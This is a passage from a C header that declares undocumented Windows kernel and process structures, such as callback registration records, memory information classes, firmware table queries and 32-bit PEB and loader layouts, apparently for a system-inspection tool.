PEX_EXTENSION_INFORMATION_V1;\n\ntypedef struct _EX_EXTENSION_VERSION {\n    USHORT MajorVersion;\n    USHORT MinorVersion;\n} EX_EXTENSION_VERSION, * PEX_EXTENSION_VERSION;\n\ntypedef struct _EX_EXTENSION_INFORMATION_V2 {\n    USHORT Id;\n    EX_EXTENSION_VERSION Version;\n    USHORT FunctionCount;\n} EX_EXTENSION_INFORMATION_V2, * PEX_EXTENSION_INFORMATION_V2;\n\ntypedef struct _EX_HOST_TABLE {\n    EX_EXTENSION_INFORMATION_V2 HostInformation;\n    PVOID FunctionTable; //callbacks\n} EX_HOST_TABLE, * PEX_HOST_TABLE;\n\ntypedef struct _EX_HOST_PARAMS {\n    EX_EXTENSION_INFORMATION_V1 HostInformation;\n    POOL_TYPE PoolType;\n    PVOID HostTable;\n    PVOID NotificationRoutine;\n    PVOID NotificationContext;\n} EX_HOST_PARAMS, * PEX_HOST_PARAMS;\n\ntypedef struct _EX_HOST_ENTRY_V1 {\n    LIST_ENTRY ListEntry;\n    LONG RefCounter;\n    EX_HOST_PARAMS HostParameters;\n    EX_RUNDOWN_REF RundownProtection;\n    EX_PUSH_LOCK PushLock;\n    PVOID FunctionTable; //callbacks\n    ULONG Flags;\n} EX_HOST_ENTRY_V1, * PEX_HOST_ENTRY_V1;\n\ntypedef struct _EX_HOST_ENTRY_V2 {\n    LIST_ENTRY ListEntry;\n    EX_EXTENSION_INFORMATION_V2 HostInformation;\n    ULONG64 RefCounter;\n    EX_PUSH_LOCK PushLock;\n    PEX_HOST_TABLE HostTablesPtr;\n    USHORT HostTablesCount;\n    PEX_HOST_TABLE CurrentHostTableEntry; //only set when an extension registers\n    PVOID NotificationRoutine;\n    PVOID NotificationContext;\n    EX_EXTENSION_VERSION ExtensionVersion;\n    EX_RUNDOWN_REF RundownProtection;\n    PVOID FunctionTable;\n    USHORT ExtensionTableFunctionCount;\n    ULONG Pad;\n    ULONG Flags;\n    EX_HOST_TABLE HostTables[1];\n} EX_HOST_ENTRY_V2, * PEX_HOST_ENTRY_V2;\n\ntypedef struct _EX_EXTENSION_REGISTRATION {\n    EX_EXTENSION_INFORMATION_V1 Information;\n    PVOID FunctionTable;\n    PVOID* HostTable;\n    PDRIVER_OBJECT DriverObject;\n} EX_EXTENSION_REGISTRATION, * PEX_EXTENSION_REGISTRATION;\n\ntypedef struct _EX_CALLBACK {\n    EX_FAST_REF RoutineBlock;\n} EX_CALLBACK, 
*PEX_CALLBACK;\n\ntypedef struct _EX_CALLBACK_ROUTINE_BLOCK {\n    EX_RUNDOWN_REF RundownProtect;\n    PVOID Function; //PEX_CALLBACK_FUNCTION\n    PVOID Context;\n} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;\n\ntypedef struct _KBUGCHECK_CALLBACK_RECORD {\n    LIST_ENTRY Entry;\n    PVOID CallbackRoutine;\n    PVOID Buffer;\n    ULONG Length;\n    PUCHAR Component;\n    ULONG_PTR Checksum;\n    UCHAR State;\n} KBUGCHECK_CALLBACK_RECORD, *PKBUGCHECK_CALLBACK_RECORD;\n\ntypedef enum _KBUGCHECK_CALLBACK_REASON {\n    KbCallbackInvalid,\n    KbCallbackReserved1,\n    KbCallbackSecondaryDumpData,\n    KbCallbackDumpIo,\n    KbCallbackAddPages,\n    KbCallbackSecondaryMultiPartDumpData,\n    KbCallbackRemovePages,\n    KbCallbackTriageDumpData\n} KBUGCHECK_CALLBACK_REASON;\n\ntypedef struct _KBUGCHECK_REASON_CALLBACK_RECORD {\n    LIST_ENTRY Entry;\n    PVOID CallbackRoutine;\n    PUCHAR Component;\n    ULONG_PTR Checksum;\n    KBUGCHECK_CALLBACK_REASON Reason;\n    UCHAR State;\n} KBUGCHECK_REASON_CALLBACK_RECORD, *PKBUGCHECK_REASON_CALLBACK_RECORD;\n\ntypedef struct _CM_CALLBACK_CONTEXT_BLOCK {\n    LIST_ENTRY CallbackListEntry;\n    LONG PreCallListHead;\n    LARGE_INTEGER Cookie;\n    PVOID CallerContext; \n    PEX_CALLBACK_FUNCTION Function;\n    UNICODE_STRING Altitude;\n    LIST_ENTRY ObjectContextListHead;\n} CM_CALLBACK_CONTEXT_BLOCK, *PCM_CALLBACK_CONTEXT_BLOCK;\n\ntypedef struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION {\n    struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION *Next;\n    PVOID CallbackRoutine; //PSE_LOGON_SESSION_TERMINATED_ROUTINE\n} SEP_LOGON_SESSION_TERMINATED_NOTIFICATION, *PSEP_LOGON_SESSION_TERMINATED_NOTIFICATION;\n\ntypedef struct _NOTIFICATION_PACKET {\n    LIST_ENTRY ListEntry;\n    PVOID DriverObject; //PDRIVER_OBJECT\n    PVOID NotificationRoutine; //PDRIVER_FS_NOTIFICATION\n} NOTIFICATION_PACKET, *PNOTIFICATION_PACKET;\n\ntypedef struct _SHUTDOWN_PACKET {\n    LIST_ENTRY ListEntry;\n    PVOID DeviceObject; 
//PDEVICE_OBJECT\n} SHUTDOWN_PACKET, *PSHUTDOWN_PACKET;\n\n#define EX_CALLBACK_SIGNATURE 'llaC'\n\ntypedef struct _CALLBACK_OBJECT {\n    ULONG Signature;\n    KSPIN_LOCK Lock;\n    LIST_ENTRY RegisteredCallbacks;\n    BOOLEAN AllowMultipleCallbacks;\n    UCHAR reserved[3];\n} CALLBACK_OBJECT, *PCALLBACK_OBJECT;\n\n// Since 8.1\ntypedef struct _CALLBACK_OBJECT_V2 {\n    ULONG Signature;\n    KSPIN_LOCK Lock;\n    LIST_ENTRY RegisteredCallbacks;\n    BOOLEAN AllowMultipleCallbacks;\n    LIST_ENTRY ExpCallbackList;\n} CALLBACK_OBJECT_V2, * PCALLBACK_OBJECT_V2;\n\ntypedef struct _CALLBACK_REGISTRATION {\n    LIST_ENTRY Link;\n    PCALLBACK_OBJECT CallbackObject;\n    PVOID CallbackFunction; //PCALLBACK_FUNCTION\n    PVOID CallbackContext;\n    ULONG Busy;\n    BOOLEAN UnregisterWaiting;\n} CALLBACK_REGISTRATION, *PCALLBACK_REGISTRATION;\n\ntypedef ULONG OB_OPERATION;\n\n#define OB_OPERATION_HANDLE_CREATE              0x00000001\n#define OB_OPERATION_HANDLE_DUPLICATE           0x00000002\n\ntypedef struct _OB_CALLBACK_CONTEXT_BLOCK {\n    LIST_ENTRY CallbackListEntry;\n    OB_OPERATION Operations;\n    ULONG Flags;\n    struct _OB_REGISTRATION* Registration;\n    POBJECT_TYPE ObjectType;\n    PVOID PreCallback;\n    PVOID PostCallback;\n    EX_RUNDOWN_REF RundownReference;\n} OB_CALLBACK_CONTEXT_BLOCK, *POB_CALLBACK_CONTEXT_BLOCK;\n\ntypedef struct _OB_REGISTRATION {\n    USHORT Version;\n    USHORT RegistrationCount;\n    PVOID  RegistrationContext;\n    UNICODE_STRING Altitude;\n    OB_CALLBACK_CONTEXT_BLOCK* CallbackContext;\n} OB_REGISTRATION, * POB_REGISTRATION;\n\n#define PO_POWER_SETTINGS_REGISTRATION_TAG 'teSP'\n\ntypedef struct _POP_POWER_SETTING_REGISTRATION_V1 {\n    LIST_ENTRY Link;\n    ULONG Tag;\n    PVOID CallbackThread; //PKTHREAD\n    UCHAR UnregisterOnReturn;\n    UCHAR UnregisterPending;\n    GUID Guid;\n    PVOID LastValue; //PPOP_POWER_SETTING_VALUE\n    PVOID Callback;\n    PVOID Context;\n    PDEVICE_OBJECT DeviceObject;\n} 
POP_POWER_SETTING_REGISTRATION_V1, *PPOP_POWER_SETTING_REGISTRATION_V1;\n\n//\n// WARNING: this structure definition is incomplete. \n// Tail is incorrect/incomplete for newest Win10 versions.\n//\ntypedef struct _POP_POWER_SETTING_REGISTRATION_V2 {\n    LIST_ENTRY Link;\n    ULONG Tag;\n    PVOID CallbackThread; //PKTHREAD   \n    UCHAR UnregisterOnReturn;\n    UCHAR UnregisterPending;\n    GUID Guid;\n    GUID Guid2;\n    PVOID LastValue; //PPOP_POWER_SETTING_VALUE\n    PVOID Callback;\n    PVOID Context;\n    PDEVICE_OBJECT DeviceObject;\n} POP_POWER_SETTING_REGISTRATION_V2, *PPOP_POWER_SETTING_REGISTRATION_V2;\n\ntypedef struct _RTL_CALLBACK_REGISTER {\n    ULONG Flags;\n    EX_RUNDOWN_REF RundownReference;\n    PVOID DebugPrintCallback;\n    LIST_ENTRY ListEntry;\n} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;\n\ntypedef\nVOID\n(*PPO_COALESCING_CALLBACK) (\n    _In_ ULONG Reason,\n    _In_ PDEVICE_OBJECT DeviceObject,\n    _In_ PVOID Context);\n\ntypedef struct _PO_COALESCING_CALLBACK_V1 {\n    EX_PUSH_LOCK PushLock;\n    PVOID CoalescingCallback;\n    PVOID SelfPtr;\n    PPO_COALESCING_CALLBACK Callback;\n    BOOLEAN ClientOrServer;\n    PVOID Context;\n} PO_COALESCING_CALLBACK_V1, * PPO_COALESCING_CALLBACK_V1;\n\ntypedef struct _PO_COALESCING_CALLBACK_V2 {\n    EX_PUSH_LOCK PushLock;\n    PVOID CoalescingCallback;\n    PVOID SelfPtr;\n    PPO_COALESCING_CALLBACK Callback;\n    BOOLEAN ClientOrServer;\n    PVOID Context;\n    LIST_ENTRY Link;\n    EX_CALLBACK ExCallback;\n} PO_COALESCING_CALLBACK_V2, * PPO_COALESCING_CALLBACK_V2;\n\ntypedef\nBOOLEAN\n(*PNMI_CALLBACK)(\n    __in_opt PVOID Context,\n    __in BOOLEAN Handled\n    );\n\ntypedef struct _KNMI_HANDLER_CALLBACK {\n    struct _KNMI_HANDLER_CALLBACK* Next;\n    PNMI_CALLBACK Callback;\n    PVOID Context;\n    PVOID Handle;\n} KNMI_HANDLER_CALLBACK, * PKNMI_HANDLER_CALLBACK;\n\ntypedef\nNTSTATUS\n(NTAPI* SILO_MONITOR_CREATE_CALLBACK)(\n    _In_ PESILO Silo\n    );\n\ntypedef\nVOID\n(NTAPI* 
SILO_MONITOR_TERMINATE_CALLBACK)(\n    _In_ PESILO Silo\n    );\n\n#define SILO_MONITOR_REGISTRATION_VERSION (1)\n\ntypedef struct _SERVER_SILO_MONITOR {\n    LIST_ENTRY ListEntry;\n    UCHAR Version;\n    BOOLEAN MonitorHost;\n    BOOLEAN MonitorExistingSilos;\n    UCHAR Reserved[5];\n    SILO_MONITOR_CREATE_CALLBACK CreateCallback;\n    SILO_MONITOR_TERMINATE_CALLBACK TerminateCallback;\n    union {\n        PUNICODE_STRING DriverObjectName;\n        PUNICODE_STRING ComponentName;\n    };\n} SERVER_SILO_MONITOR, * PSERVER_SILO_MONITOR;\n\n//\n// Errata Manager\n//\ntypedef struct _EMP_CALLBACK_DB_RECORD {\n    GUID CallbackId;\n    PVOID CallbackFunc;\n    LONG_PTR CallbackFuncReference;\n    PVOID Context;\n    SINGLE_LIST_ENTRY List;\n    SINGLE_LIST_ENTRY CallbackDependencyListHead;\n    ULONG NumberOfStrings;\n    ULONG NumberOfNumerics;\n    ULONG NumberOfEntries;\n    struct _EMP_ENTRY_DB_RECORD* EntryList[1];\n} EMP_CALLBACK_DB_RECORD, * PEMP_CALLBACK_DB_RECORD;\n\ntypedef struct _EMP_CALLBACK_LIST_ENTRY {\n    EMP_CALLBACK_DB_RECORD* CallbackRecord;\n    SINGLE_LIST_ENTRY CallbackListEntry;\n} EMP_CALLBACK_LIST_ENTRY, * PEMP_CALLBACK_LIST_ENTRY;\n\ntypedef enum _IO_NOTIFICATION_EVENT_CATEGORY {\n    EventCategoryReserved,\n    EventCategoryHardwareProfileChange,\n    EventCategoryDeviceInterfaceChange,\n    EventCategoryTargetDeviceChange\n} IO_NOTIFICATION_EVENT_CATEGORY;\n\ntypedef\nNTSTATUS\n(*PDRIVER_NOTIFICATION_CALLBACK_ROUTINE) (\n    IN PVOID NotificationStructure,\n    IN PVOID Context\n    );\n\ntypedef struct _KGUARDED_MUTEX {\n    LONG Count;\n    PKTHREAD Owner;\n    ULONG Contention;\n    KEVENT Event;\n    union {\n        struct {\n            SHORT KernelApcDisable;\n            SHORT SpecialApcDisable;\n        };\n\n        ULONG CombinedApcDisable;\n    };\n\n} KGUARDED_MUTEX, * PKGUARDED_MUTEX;\n\ntypedef struct _DEVICE_CLASS_NOTIFY_ENTRY {\n\n    // \n    // Header entries \n    // \n\n    LIST_ENTRY ListEntry;\n    
IO_NOTIFICATION_EVENT_CATEGORY EventCategory;\n    ULONG SessionId;\n    HANDLE SessionHandle;\n    PDRIVER_NOTIFICATION_CALLBACK_ROUTINE CallbackRoutine;\n    PVOID Context;\n    PDRIVER_OBJECT DriverObject;\n    USHORT RefCount;\n    BOOLEAN Unregistered;\n    PKGUARDED_MUTEX Lock;\n    PERESOURCE EntryLock;\n    // \n    // ClassGuid - the guid of the device class we are interested in \n    // \n\n    GUID ClassGuid;\n\n} DEVICE_CLASS_NOTIFY_ENTRY, * PDEVICE_CLASS_NOTIFY_ENTRY;\n\n/*\n** Callbacks END\n*/\n\n/*\n*  NTQSI Modules START\n*/\n\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION {\n    HANDLE Section;\n    PVOID MappedBase;\n    PVOID ImageBase;\n    ULONG ImageSize;\n    ULONG Flags;\n    USHORT LoadOrderIndex;\n    USHORT InitOrderIndex;\n    USHORT LoadCount;\n    USHORT OffsetToFileName;\n    UCHAR FullPathName[256];\n} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;\n\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION_EX {\n    USHORT NextOffset;\n    RTL_PROCESS_MODULE_INFORMATION BaseInfo;\n    ULONG ImageChecksum;\n    ULONG TimeDateStamp;\n    PVOID DefaultBase;\n} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX;\n\ntypedef struct _RTL_PROCESS_MODULES {\n    ULONG NumberOfModules;\n    RTL_PROCESS_MODULE_INFORMATION Modules[1];\n} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;\n\n/*\n*\tNTQSI Modules END\n*/\n\n/*\n** Virtual Memory START\n*/\n\ntypedef enum _MEMORY_INFORMATION_CLASS {\n    MemoryBasicInformation = 0,\n    MemoryWorkingSetInformation,\n    MemoryMappedFilenameInformation,\n    MemoryRegionInformation,\n    MemoryWorkingSetExInformation,\n    MemorySharedCommitInformation,\n    MemoryImageInformation,\n    MemoryRegionInformationEx,\n    MemoryPrivilegedBasicInformation,\n    MemoryEnclaveImageInformation,\n    MemoryBasicInformationCapped,\n    MemoryPhysicalContiguityInformation,\n    MemoryBadInformation,\n    MemoryBadInformationAllProcesses,\n    MaxMemoryInfoClass\n} 
MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;\n\ntypedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS {\n    VmPrefetchInformation,\n    VmPagePriorityInformation,\n    VmCfgCallTargetInformation,\n    VmPageDirtyStateInformation\n} VIRTUAL_MEMORY_INFORMATION_CLASS;\n\ntypedef struct _MEMORY_REGION_INFORMATION {\n    PVOID AllocationBase;\n    ULONG AllocationProtect;\n    union\n    {\n        ULONG RegionType;\n        struct\n        {\n            ULONG Private : 1;\n            ULONG MappedDataFile : 1;\n            ULONG MappedImage : 1;\n            ULONG MappedPageFile : 1;\n            ULONG MappedPhysical : 1;\n            ULONG DirectMapped : 1;\n            ULONG SoftwareEnclave : 1;\n            ULONG PageSize64K : 1;\n            ULONG Reserved : 24;\n        };\n    };\n    SIZE_T RegionSize;\n    SIZE_T CommitSize;\n} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;\n\ntypedef struct _MEMORY_REGION_INFORMATION_V2 {\n    PVOID AllocationBase;\n    ULONG AllocationProtect;\n    union\n    {\n        ULONG RegionType;\n        struct\n        {\n            ULONG Private : 1;\n            ULONG MappedDataFile : 1;\n            ULONG MappedImage : 1;\n            ULONG MappedPageFile : 1;\n            ULONG MappedPhysical : 1;\n            ULONG DirectMapped : 1;\n            ULONG SoftwareEnclave : 1; // RS3\n            ULONG PageSize64K : 1;\n            ULONG Reserved : 24;\n        };\n    };\n    SIZE_T RegionSize;\n    SIZE_T CommitSize;\n    ULONG_PTR PartitionId; // 19H1\n} MEMORY_REGION_INFORMATION_V2, * PMEMORY_REGION_INFORMATION_V2;\n\ntypedef struct _MEMORY_REGION_INFORMATION_V3 {\n    PVOID AllocationBase;\n    ULONG AllocationProtect;\n    union\n    {\n        ULONG RegionType;\n        struct\n        {\n            ULONG Private : 1;\n            ULONG MappedDataFile : 1;\n            ULONG MappedImage : 1;\n            ULONG MappedPageFile : 1;\n            ULONG MappedPhysical : 1;\n            ULONG DirectMapped : 1;\n      
      ULONG SoftwareEnclave : 1; // RS3\n            ULONG PageSize64K : 1;\n            ULONG PlaceholderReservation : 1; // RS4\n            ULONG MappedAwe : 1; // 21H1\n            ULONG MappedWriteWatch : 1;\n            ULONG PageSizeLarge : 1;\n            ULONG PageSizeHuge : 1;\n            ULONG Reserved : 19;\n        };\n    };\n    SIZE_T RegionSize;\n    SIZE_T CommitSize;\n    ULONG_PTR PartitionId; // 19H1\n    ULONG_PTR NodePreference; // 20H1\n} MEMORY_REGION_INFORMATION_V3, * PMEMORY_REGION_INFORMATION_V3;\n\ntypedef struct _MEMORY_RANGE_ENTRY {\n    PVOID VirtualAddress;\n    SIZE_T NumberOfBytes;\n} MEMORY_RANGE_ENTRY, *PMEMORY_RANGE_ENTRY;\n\ntypedef struct _MEMORY_IMAGE_INFORMATION {\n    PVOID ImageBase;\n    SIZE_T SizeOfImage;\n    union\n    {\n        ULONG ImageFlags;\n        struct\n        {\n            ULONG ImagePartialMap : 1;\n            ULONG ImageNotExecutable : 1;\n            ULONG ImageSigningLevel : 4; // RS3\n            ULONG ImageExtensionPresent : 1; // 24H2\n            ULONG Reserved : 25;\n        };\n    };\n} MEMORY_IMAGE_INFORMATION, * PMEMORY_IMAGE_INFORMATION;\n\ntypedef struct _MEMORY_ENCLAVE_IMAGE_INFORMATION {\n    MEMORY_IMAGE_INFORMATION ImageInfo;\n    UCHAR UniqueID[32];\n    UCHAR AuthorID[32];\n} MEMORY_ENCLAVE_IMAGE_INFORMATION, * PMEMORY_ENCLAVE_IMAGE_INFORMATION;\n\ntypedef struct _MEMORY_WORKING_SET_BLOCK {\n    ULONG_PTR Protection : 5;\n    ULONG_PTR ShareCount : 3;\n    ULONG_PTR Shared : 1;\n    ULONG_PTR Node : 3;\n#ifdef _WIN64\n    ULONG_PTR VirtualPage : 52;\n#else\n    ULONG VirtualPage : 20;\n#endif\n} MEMORY_WORKING_SET_BLOCK, * PMEMORY_WORKING_SET_BLOCK;\n\ntypedef struct _MEMORY_WORKING_SET_INFORMATION {\n    ULONG_PTR NumberOfEntries;\n    _Field_size_(NumberOfEntries) MEMORY_WORKING_SET_BLOCK WorkingSetInfo[1];\n} MEMORY_WORKING_SET_INFORMATION, * PMEMORY_WORKING_SET_INFORMATION;\n\ntypedef struct _MEMORY_WORKING_SET_EX_BLOCK {\n    union {\n        struct {\n            ULONG_PTR 
Valid : 1;\n            ULONG_PTR ShareCount : 3;\n            ULONG_PTR Win32Protection : 11;\n            ULONG_PTR Shared : 1;\n            ULONG_PTR Node : 6;\n            ULONG_PTR Locked : 1;\n            ULONG_PTR LargePage : 1;\n            ULONG_PTR Priority : 3;\n            ULONG_PTR Reserved : 3;\n            ULONG_PTR SharedOriginal : 1;\n            ULONG_PTR Bad : 1;\n#ifdef _WIN64\n            // 64-bit only: the fields above already total 32 bits.\n            ULONG_PTR Win32GraphicsProtection : 4;\n            ULONG_PTR ReservedUlong : 28;\n#endif\n        };\n        struct {\n            ULONG_PTR Valid : 1;\n            ULONG_PTR Reserved0 : 14;\n            ULONG_PTR Shared : 1;\n            ULONG_PTR Reserved1 : 5;\n            ULONG_PTR PageTable : 1;\n            ULONG_PTR Location : 2;\n            ULONG_PTR Priority : 3;\n            ULONG_PTR ModifiedList : 1;\n            ULONG_PTR Reserved2 : 2;\n            ULONG_PTR SharedOriginal : 1;\n            ULONG_PTR Bad : 1;\n#ifdef _WIN64\n            ULONG_PTR ReservedUlong : 32;\n#endif\n        } Invalid;\n    };\n} MEMORY_WORKING_SET_EX_BLOCK, * PMEMORY_WORKING_SET_EX_BLOCK;\n\ntypedef struct _MEMORY_WORKING_SET_EX_INFORMATION {\n    PVOID VirtualAddress;\n    union {\n        MEMORY_WORKING_SET_EX_BLOCK VirtualAttributes;\n        ULONG_PTR Long;\n    } u1;\n} MEMORY_WORKING_SET_EX_INFORMATION, * PMEMORY_WORKING_SET_EX_INFORMATION;\n\n#define MM_ZERO_ACCESS         0  // this value is not used.\n#define MM_READONLY            1\n#define MM_EXECUTE             2\n#define MM_EXECUTE_READ        3\n#define MM_READWRITE           4  // bit 2 is set if this is writable.\n#define MM_WRITECOPY           5\n#define MM_EXECUTE_READWRITE   6\n#define MM_EXECUTE_WRITECOPY   7\n\n#define MM_NOCACHE            0x8\n#define MM_GUARD_PAGE         0x10\n#define MM_DECOMMIT           0x10   // NO_ACCESS, Guard page\n#define MM_NOACCESS           0x18   // NO_ACCESS, Guard_page, nocache.\n#define MM_UNKNOWN_PROTECTION 0x100  // bigger than 5 bits!\n\n#define 
MM_INVALID_PROTECTION ((ULONG)-1)  // bigger than 5 bits!\n\n#define MM_PROTECTION_WRITE_MASK     4\n#define MM_PROTECTION_COPY_MASK      1\n#define MM_PROTECTION_OPERATION_MASK 7 // mask off guard page and nocache.\n#define MM_PROTECTION_EXECUTE_MASK   2\n\n#define MM_SECURE_DELETE_CHECK 0x55\n\n/*\n** Virtual Memory END\n*/\n\n/*\n** System Firmware START\n*/\n\ntypedef enum _SYSTEM_FIRMWARE_TABLE_ACTION {\n    SystemFirmwareTable_Enumerate,\n    SystemFirmwareTable_Get,\n    SystemFirmwareTableMax\n} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;\n\ntypedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {\n    ULONG ProviderSignature;\n    SYSTEM_FIRMWARE_TABLE_ACTION Action;\n    ULONG TableID;\n    ULONG TableBufferLength;\n    UCHAR TableBuffer[ANYSIZE_ARRAY];\n} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;\n\n/*\n** System Firmware END\n*/\n\n//\n//  PEB/TEB\n//\n#define GDI_HANDLE_BUFFER_SIZE32  34\n#define GDI_HANDLE_BUFFER_SIZE64  60\n\n#if !defined(_M_X64)\n#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE32\n#else\n#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE64\n#endif\n\ntypedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];\ntypedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];\ntypedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];\n\n#define RTL_MAX_DRIVE_LETTERS 32\n#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001\n\n// 32-bit definitions\ntypedef struct _STRING32 {\n    USHORT Length;\n    USHORT MaximumLength;\n    ULONG Buffer;\n} STRING32;\ntypedef STRING32 *PSTRING32;\n\ntypedef STRING32 UNICODE_STRING32;\n\n#if (_MSC_VER < 1300) && !defined(_WINDOWS_)\ntypedef struct LIST_ENTRY32 {\n    DWORD Flink;\n    DWORD Blink;\n} LIST_ENTRY32;\ntypedef LIST_ENTRY32 *PLIST_ENTRY32;\n\ntypedef struct LIST_ENTRY64 {\n    ULONGLONG Flink;\n    ULONGLONG Blink;\n} LIST_ENTRY64;\ntypedef LIST_ENTRY64 *PLIST_ENTRY64;\n#endif\n\n#define WOW64_POINTER(Type) ULONG\n\ntypedef struct 
_PEB_LDR_DATA32 {\n    ULONG Length;\n    BOOLEAN Initialized;\n    WOW64_POINTER(HANDLE) SsHandle;\n    LIST_ENTRY32 InLoadOrderModuleList;\n    LIST_ENTRY32 InMemoryOrderModuleList;\n    LIST_ENTRY32 InInitializationOrderModuleList;\n    WOW64_POINTER(PVOID) EntryInProgress;\n    BOOLEAN ShutdownInProgress;\n    WOW64_POINTER(HANDLE) ShutdownThreadId;\n} PEB_LDR_DATA32, *PPEB_LDR_DATA32;\n\n#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks )\n\ntypedef struct _LDR_DATA_TABLE_ENTRY32 {\n    LIST_ENTRY32 InLoadOrderLinks;\n    LIST_ENTRY32 InMemoryOrderLinks;\n    LIST_ENTRY32 InInitializationOrderLinks;\n    WOW64_POINTER(PVOID) DllBase;\n    WOW64_POINTER(PVOID) EntryPoint;\n    ULONG SizeOfImage;\n    UNICODE_STRING32 FullDllName;\n    UNICODE_STRING32 BaseDllName;\n    ULONG Flags;\n    USHORT LoadCount;\n    USHORT TlsIndex;\n    union\n    {\n        LIST_ENTRY32 HashLinks;\n        struct\n        {\n            WOW64_POINTER(PVOID) SectionPointer;\n            ULONG CheckSum;\n        };\n    };\n    union\n    {\n        ULONG TimeDateStamp;\n        WOW64_POINTER(PVOID) LoadedImports;\n    };\n    WOW64_POINTER(PVOID) EntryPointActivationContext;\n    WOW64_POINTER(PVOID) PatchInformation;\n    LIST_ENTRY32 ForwarderLinks;\n    LIST_ENTRY32 ServiceTagLinks;\n    LIST_ENTRY32 StaticLinks;\n    WOW64_POINTER(PVOID) ContextInformation;\n    WOW64_POINTER(ULONG_PTR) OriginalBase;\n    LARGE_INTEGER LoadTime;\n} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;\n\ntypedef struct _CURDIR32 {\n    UNICODE_STRING32 DosPath;\n    WOW64_POINTER(HANDLE) Handle;\n} CURDIR32, *PCURDIR32;\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR32 {\n    USHORT Flags;\n    USHORT Length;\n    ULONG TimeStamp;\n    STRING32 DosPath;\n} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS32 {\n    ULONG MaximumLength;\n    ULONG Length;\n\n    ULONG Flags;\n    ULONG DebugFlags;\n\n    
WOW64_POINTER(HANDLE) ConsoleHandle;\n    ULONG ConsoleFlags;\n    WOW64_POINTER(HANDLE) StandardInput;\n    WOW64_POINTER(HANDLE) StandardOutput;\n    WOW64_POINTER(HANDLE) StandardError;\n\n    CURDIR32 CurrentDirectory;\n    UNICODE_STRING32 DllPath;\n    UNICODE_STRING32 ImagePathName;\n    UNICODE_STRING32 CommandLine;\n    WOW64_POINTER(PVOID) Environment;\n\n    ULONG StartingX;\n    ULONG StartingY;\n    ULONG CountX;\n    ULONG CountY;\n    ULONG CountCharsX;\n    ULONG CountCharsY;\n    ULONG FillAttribute;\n\n    ULONG WindowFlags;\n    ULONG ShowWindowFlags;\n    UNICODE_STRING32 WindowTitle;\n    UNICODE_STRING32 DesktopInfo;\n    UNICODE_STRING32 ShellInfo;\n    UNICODE_STRING32 RuntimeData;\n    RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\n\n    ULONG EnvironmentSize;\n    ULONG EnvironmentVersion;\n} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32;\n\ntypedef struct _PEB32 {\n    BOOLEAN InheritedAddressSpace;\n    BOOLEAN ReadImageFileExecOptions;\n    BOOLEAN BeingDebugged;\n    union\n    {\n        BOOLEAN BitField;\n        struct\n        {\n            BOOLEAN ImageUsesLargePages : 1;\n            BOOLEAN IsProtectedProcess : 1;\n            BOOLEAN IsLegacyProcess : 1;\n            BOOLEAN IsImageDynamicallyRelocated : 1;\n            BOOLEAN SkipPatchingUser32Forwarders : 1;\n            BOOLEAN SpareBits : 3;\n        };\n    };\n    WOW64_POINTER(HANDLE) Mutant;\n\n    WOW64_POINTER(PVOID) ImageBaseAddress;\n    WOW64_POINTER(PPEB_LDR_DATA) Ldr;\n    WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters;\n    WOW64_POINTER(PVOID) SubSystemData;\n    WOW64_POINTER(PVOID) ProcessHeap;\n    WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock;\n    WOW64_POINTER(PVOID) AtlThunkSListPtr;\n    WOW64_POINTER(PVOID) IFEOKey;\n    union\n    {\n        ULONG CrossProcessFlags;\n        struct\n        {\n            ULONG ProcessInJob : 1;\n            ULONG ProcessInitializing : 1;\n            ULONG 
ProcessUsingVEH : 1;\n            ULONG ProcessUsingVCH : 1;\n            ULONG ProcessUsingFTH : 1;\n            ULONG ProcessPreviouslyThrottled : 1;\n            ULONG ProcessCurrentlyThrottled : 1;\n            ULONG ReservedBits0 : 25;\n        };\n        ULONG EnvironmentUpdateCount;\n    };\n    union\n    {\n        WOW64_POINTER(PVOID) KernelCallbackTable;\n        WOW64_POINTER(PVOID) UserSharedInfoPtr;\n    };\n    ULONG SystemReserved[1];\n    ULONG AtlThunkSListPtr32;\n    WOW64_POINTER(PVOID) ApiSetMap;\n    ULONG TlsExpansionCounter;\n    WOW64_POINTER(PVOID) TlsBitmap;\n    ULONG TlsBitmapBits[2];\n    WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase;\n    WOW64_POINTER(PVOID) HotpatchInformation;\n    WOW64_POINTER(PPVOID) ReadOnlyStaticServerData;\n    WOW64_POINTER(PVOID) 